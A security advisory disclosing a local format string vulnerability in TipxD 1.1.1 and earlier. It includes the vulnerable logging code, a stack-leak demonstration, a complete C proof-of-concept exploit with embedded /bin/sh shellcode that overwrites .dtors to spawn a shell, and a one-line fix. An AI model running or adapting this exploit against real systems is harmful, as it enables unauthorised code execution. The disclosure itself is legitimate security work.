
08 - tipxd <= 1.1.1 Format String Vulnerability


No System Group - Advisory #08 - 15/11/04

  • Program: Tom's IPX Tunneling Daemon - TipxD
  • Homepage: http://tipxd.sourceforge.net
  • Vulnerable Versions: TipxD 1.1.1 and prior
  • Risk: Low
  • Impact: Local Format String Vulnerability

DESCRIPTION

tipxd is an IPX tunneling daemon which snoops on a local network for IPX 802.3 traffic, packages it and sends it over one or many TCP/IP connections to tipxd running on remote machines, where it is unpacked and sent via the local network. To the IPX networks, it then appears that the LANs are joined. This is a request for testing and bug-finding. It is intended for playing IPX based games where the remote machines are joined only by a TCP/IP network, and typically when the gaming machines are each behind a firewall.

More information at: http://tipxd.sourceforge.net

DETAILS

tipxd is affected by a format string bug in the tipxd_log() function, at line 61 of src/log.c:

--- log.c --- 
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */

54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,log_entry); // The format bug
62: }
63:
64: return;
65: }
--- log.c ---

Parts of the stack memory can be revealed by supplying a format string as the configuration file name, for example:

coki@servidor:~$ tipxd -C AAAA%08x 
Unable to open configuration file : No such file or directory

coki@servidor:~$ tail -n 1 /var/log/messages
Nov 15 11:03:40 servidor tipxd[8360]: Config file is AAAA0804c8d7
coki@servidor:~$


EXPLOIT

------------------ tipxd_exp.c ------------------ 
/* tipxd_exp.c

TipxD Format String Vulnerability

TipxD <= 1.1.1 local exploit (Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/


#include <stdio.h>
#include <string.h>

#define PATH "/bin/tipxd"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

/* finding .dtors address */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);
}
pclose(f);
dtorsaddr = dtorsaddr + 4;

printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);

bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));

strcat(buffer, "x");

/* adding .dtors address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}

/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);

bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);

cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);

memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);

sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);

strcat(buffer, temp);

execle(PATH, "tipxd", "-f", buffer, NULL, env);
}

int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;

return addr;
}

---------------- tipxd_exp.c -----------------

coki@servidor:~$ make tipxd_exp
coki@servidor:~$ ./tipxd_exp

tipxd local exploit (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

shellcode address = 0xbfffffa7
.dtors address = 0x0804fbe0

Unable to open configuration file : File name too long

sh-2.05b$

This exploit does not give a root shell :(

SOLUTIONS

Change the tipxd_log() function in src/log.c as follows (line 61 passes the already-expanded log entry as the format argument of syslog(); the fix supplies a fixed "%s" format and passes the entry as data):

--- log.c --- 
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */

54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,"%s",log_entry); // The fix
62: }
63:
64: return;
65: }
--- log.c ---


REFERENCES

http://www.nosystem.com.ar/advisories/advisory-08.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
